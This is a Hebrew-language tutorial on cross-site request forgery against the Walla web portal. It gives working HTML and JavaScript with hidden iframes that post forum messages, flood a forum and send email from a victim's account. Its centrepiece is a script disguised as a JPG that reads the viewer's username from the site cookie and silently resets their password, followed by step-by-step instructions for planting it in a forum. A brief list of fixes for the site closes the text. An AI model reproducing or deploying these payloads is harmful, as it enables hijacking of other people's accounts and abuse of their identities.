כדי לראות את שורת הכתובת באופן טוב יותר, כדאי לסמן אותה ולהעתיק אותה אל עורך טקסט כלשהו.

דבר ראשון בודקים אם המידע הזה נכון. אם שליחת המידע הזה תגרום להופעת הודעה חדשה בפורום.
משנים את file:///C:/WINDOWS/Desktop/ts.cgi ל http://community.walla.co.il/ts.cgi.
נכנסים לכתובת המתוקנת, ורואים אם נוספה הודעה חדשה לפורום. (כמובן שצריך לוודא שהsession פועל. כלומר, אפשר למשל להכנס, לבדוק אימייל, ואז להכנס לכתובת הזו ולראות אם זה עובד)

מה קורה כשנכנסים לכתובת הזו?
הדף ts.cgi, בודק את הקוקיז על המחשב. אם הוא מזהה שהמשתמש מחובר לוואלה, ושהsession פועל. (שהמשתמש לא סגר את הדפדפן מאז שהוא נכנס לחשבון שלו בוואלה). הוא מקבל כאילו המשתמש שלח טופס. ובמקרה שלנו למשל, הוא רואה שזה טופס "הודעה חדשה" והוא מפרסם אותה. (הוא יפרסם אותה אפילו אם המשתמש מושעה מהפורום).

יופי, נחמד. ומה הלאה?
כדי לגרום למשתמש להכנס לכתובת אינטרנט מסויימת, (כדי לגרום לו לשלוח טופס) לא חייבים לבקש ממנו להכנס אליה. ובמיוחד אם הכתובת כזו ארוכה בטוח היא תעורר חשד.

אז מה כן אפשר לעשות?
אפשר לבנות דף html כזה:
<html> <head> <title>Hi!</title> </head> <body> <IFrame style='position:absolute;visibility:hidden;' src='http://community.walla.co.il/ts.cgi??tsscript=f%2Fm%2Fpost&yesno=&subject=This+is+the+subject&text=Here+you+can+write+your+text&word_url_0=http%3A%2F%2F&word_0=&word_url_1=http%3A%2F%2F&word_1=&link_url_0=http%3A%2F%2F&link_desc_0=&link_url_1=http%3A%2F%2Fany.url.org&link_desc_1=Link+description&file_name=&file_desc=&file_name1=&file_desc1=&replay_email=replayemail@baaa.org&forum_id=1357&cat_id=310&father_id=0&email=&confirm_e=&fname=&forum_name=%F8%F9%FA%E5%FA+%E5%E0%E1%E8%E7%FA+%EE%E9%E3%F2&icon_id=0'></iframe> </body> </html>

הדף הזה פותח את הכתובת הזו בתוך פריים בלתי נראה. כלומר, הטופס נשלח והודעה נוספה בלי שיש לך מושג שזה באמת קרה.

.על העיקרון הזה אפשר להוסיף כמה דברים:

הצפת פורום: - די פשוט, בדף הhtml מוסיפים סקריפט שיגרום לדף לפתוח כמה וכמה פריימים:
<html> <head> <title>Nasty Script</title> </head> <body><script> for (var i=1 ; i<2 ;i++){ document.write("<IFrame style='position:absolute;visibility:hidden;' src='http://community.walla.co.il/ts.cgi??tsscript=f%2Fm%2Fpost&yesno=&subject=This+is+the+subject&text=Here+you+can+write+your+text&word_url_0=http%3A%2F%2F&word_0=&word_url_1=http%3A%2F%2F&word_1=&link_url_0=http%3A%2F%2F&link_desc_0=&link_url_1=http%3A%2F%2Fany.url.org&link_desc_1=Link+description&file_name=&file_desc=&file_name1=&file_desc1=&replay_email=replayemail@baaa.org&forum_id=1357&cat_id=310&father_id=0&email=&confirm_e=&fname=&forum_name=%F8%F9%FA%E5%FA+%E5%E0%E1%E8%E7%FA+%EE%E9%E3%F2&icon_id=0'></iframe>")} </script> </body> </html>

לגרום לקורבן לשלוח אימייל: - עושים את זה בדיוק באותה דרך.
נכנסים לדואר, כותבים מכתב חדש, פותחים את קוד המקור, משנים את מה שצריך ושומרים מה שצריך, פותחים את הקובץ דרך שולחן העבודה, רואים מה נשלח, ויש לכם כתובת להפנות אליה את הקורבן.
רק חשוב לזכור: במקום http://community.walla.co.il/ts.cgi זה http://mail.walla.co.il/ts.cgi
זה יוצא בערך ככה:
http://mail.walla.co.il/ts.cgi?tsscript=compose.commit&html_enable=1&htmlMessage=%3Ctable+width%3D100%25+dir%3D%22rtl%22%3E%3Ctr%3E%3Ctd%3E%3CDIV+id%3Dwrteplaceholder+name%3D%22wrteplaceholder%22%3Etextliminal%3CBR%3E%3CBR%3E%0D%0A%3CHR+SIZE%3D1%3E%0D%0A%3C%2FDIV%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E&action=0&id=&n=&aid=0&draft=0&attach%5B0%5D=&attach%5B1%5D=&attach%5B2%5D=&domain=0&to=korban@walla.co.il&subject=subliminal&bcc=&cc=&textMessage=textliminal

איך ניתן להשתמש בכל מה שקראנו עד עכשיו כדי לפרוץ למישהו לאימייל:
מכיוון שטופס "שינוי הגדרות חשבון" בוואלה לא מבקש את הסיסמא הישנה,
ניתן להשתמש בכל מה שלמדנו עד עכשיו כדי לגרום למישהו לשלוח טופס שינוי סיסמא..
כנסו לאימייל, הגדרות, עריכת פרטי משתמש.
משחקים עם קוד המקור כמו שהסברתי למעלה. הכתובת תצא בערך ככה
http://friends.walla.co.il/ts.cgi?tsscript=reg.commit&l=&status=1&edit=1&ReturnURL=http%3A%2F%2Fmail.walla.co.il&username=korban&password=12345&passwordv=12345&hintq=question&hint=the-answer&DD=11&MM=1&YYYY=1111&email=aaa@mail.boo.il&pharea=123&phnum=123456&fname=name&lname=fam&gender=2&cityname=scxzc&areacode=0&vcard=&keywords=&homepage=&surffrom=0&occupation=0&education=0
שימו לב: במקום המילה username צריך לכתוב את שם המשתמש של הקורבן..
לוקחים את הכתובת הזו.. משנים את מה שצריך וגורמים לו להכנס אליה.. ברגע שהוא יכנס, הסיסמא שלו תשתנה ל12345.

השיטה הזו די מסובכת, כדי לשנות ל5 אנשים שונים את הסיסמא צריך להכין 5 עותקים שונים של שבכל אחד מהם כתוב שם המשתמש של מי שזה מופנה אליו..
לכאן נכנס עוד ליקויי באבטחה שקיים באתר וואלה:
כנסו לפורום כלשהו בוואלה.. נכון יש אפשרות של "הוסף הודעה"?
שימו לב שאפשר לצרף לשם קבצים.. כל מיני קבצים.. HTML , JPG וכאלה..
כנסו שניה לפנקס רשימות, ובנו קובץ כזה: <html><font color=blue> hi</font></html>
רק במקום לשמור אותו כHTML, שמרו אותו כ JPG.. יעני, blabla.jpg
עכשיו.. תעלו את ה"תמונה" הזו לפורום.. שימו לב שלמרות שזה מתאור כתמונה (JPG) זה מוצג כדף אינטרנט לכל דבר!!

ומה אפשר לעשות עם זה?
עכשיו הגענו לקטע המעניין ביותר..
הקובץ שהעלינו לוואלה מאוכסן על שרתי וואלה.. לכן.. הוא יכול לקרוא את העוגיה של וואלה.. בעוגיה של וואלה נמצא גם שם המשתמש האחרון שהשתמשת בו בוואלה.. לכן אפשר לבנות קובץ פשוט שיקרא לעוגיה בג'אווה סקריפט ויוציא ממנה רק את שם המשתמש.. אחר כך אפשר לבנות פריים בלתי נראה שמחליף סיסמא ושמכיל את שם המשתמש של מי שצופה בדף.. ובסוף.. נורה לדף לבצע LOGOFF.. אחרי כמה דקות הסיסמא שלו תשתנה ..

הנה דוגמא: (במקרה זה, הסיסמא משתנה ל"oooo")
<html> <script> var last = document.cookie var counter = "" for (var i = 0; i < last.length; i++) if (last.charAt(i) == "n") if (last.charAt(i+1) == "i") if (last.charAt(i+2) == "c") if (last.charAt(i+3) == "k") if (last.charAt(i+4) == "="){ j=i+5; while (last.charAt(j+1) > "%"){ counter = counter + last.charAt(j) j = j+1}} for (var i=1 ; i<2 ;i++){ document.write("<iframe style='position:absolute;visibility:hidden;' src=http://friends.walla.co.il/ts.cgi?tsscript=reg.commit&l=&status=1&edit=1&ReturnURL=http%3A%2F%2Fmail.walla.co.il&username=",counter,"&password=oooo&passwordv=oooo&hintq=question&hint=tanswer&DD=11&MM=1&YYYY=1999&email=aaa@mail.boo.il&pharea=123&phnum=123456&fname=name&lname=fam&gender=2&cityname=scxzc&areacode=0&vcard=&keywords=&homepage=&surffrom=0&occupation=0&education=0></iframe>") } setTimeout('top.location.href="http://www.walla.co.il/?w=/friends/logout"', 3000) </script> </html>

חזרה כללית:
1. לוקחים את הקוד שנתתי פה למעלה
2. שומרים אותו בקובץ look-at-me.jpg
3. נכנסים לפורום כלשהו בוואלה
4. בוחרים הודעה, נכנסים אליה, ולוחצים על "הוסף תגובה" אם צריך, רושמים שם משתמש וסיסמא
*הערה ובקשה: יש למטה רשימה של דפים קודמים, תעלו את זה כתגובה להודעה בדף הכי עתיק שמצאתם. לא נחמד לתת לאנשים תמימים לאבד את חשבון האימייל שלהם על ידי זה ששמתם את זה בדף הראשון שכולם רואים ועלולים להכנס בטעות*
5. נותנים כותרת "איך אני??" בגוף ההודעה רושמים "נכון שאני כריש?"
6. יש למטה אפשרות של "הוספת קובץ", מעלים את הקובץ ששמרתם. ונותנים לו תיאור: "שמשון הכריש"
7. יש כפתור ירוק מוזר כזה.. כתוב עליו "שלח הודעה" תלחצו עליו.. נראה מה יקרה.
8. כנסו להודעה שהגבתם עליה.. שימו לב שנוספה לשם התגובה שלכם.. תלחצו עליה.. בצד שמאל מופיע קובץ עם תיאור "שמשון הכריש" ובשם "look-at-me.jpg". זו בסך הכל תמונה.. נכון? אז אין סיבה לפחד. נכון? כנסו אליה.. לא רואים כלום.. מוזר.. חכו כמה שניות.. אופס.. הוא העביר אותכם לדף הראשי של וואלה.. חכו כמה דקות.. נסו להיכנס לחשבון דואר אלקטרוני שלכם.. "שם המשתמש או הסיסמא אינם מתאימים.." מוזר.. אי אפשר להיכנס למייל.. ברכות.. הסיסמא שלך השתנתה ל"oooo" כי ניסית להסתכל על "תמונה לא מזיקה" של שמשון הכריש.. אתם לא לבד.. כל מי שינסה לראות את "שמשון הכריש" יאבד את הסיסמא שלו לטובת הסיסמא "oooo" אני מקווה שאתם זוכרים את הכתובת של התמונה.. אם תשלחו אותה למייל של מישהו אחר, הסיסמא שלו תשתנה

מה וואלה היו יכולים לעשות כדי למנוע את זה?
1. בכל פורום נורמלי קיימת מערכת של הגנה נגד הצפות.. בעיקרון פשוט אפשר לבדוק במסד הנתונים אם המשתמש שלח הודעה ב60 השניות האחרונות.
2. לשים בקשה לסיסמא ישנה בטופס עריכת הגדרות פרטי חשבון
3. לבסס את שליחת הטפסים על session id כמו בפורומי PHPBB
4. לא להרשות העלאת קבצי HTML בתחפושת או לא בתחפושת.. לבצע סריקה על הקבצים שמועלים.
5. להתייחס לאנשים שמזהירים אותם כבר חצי שנה.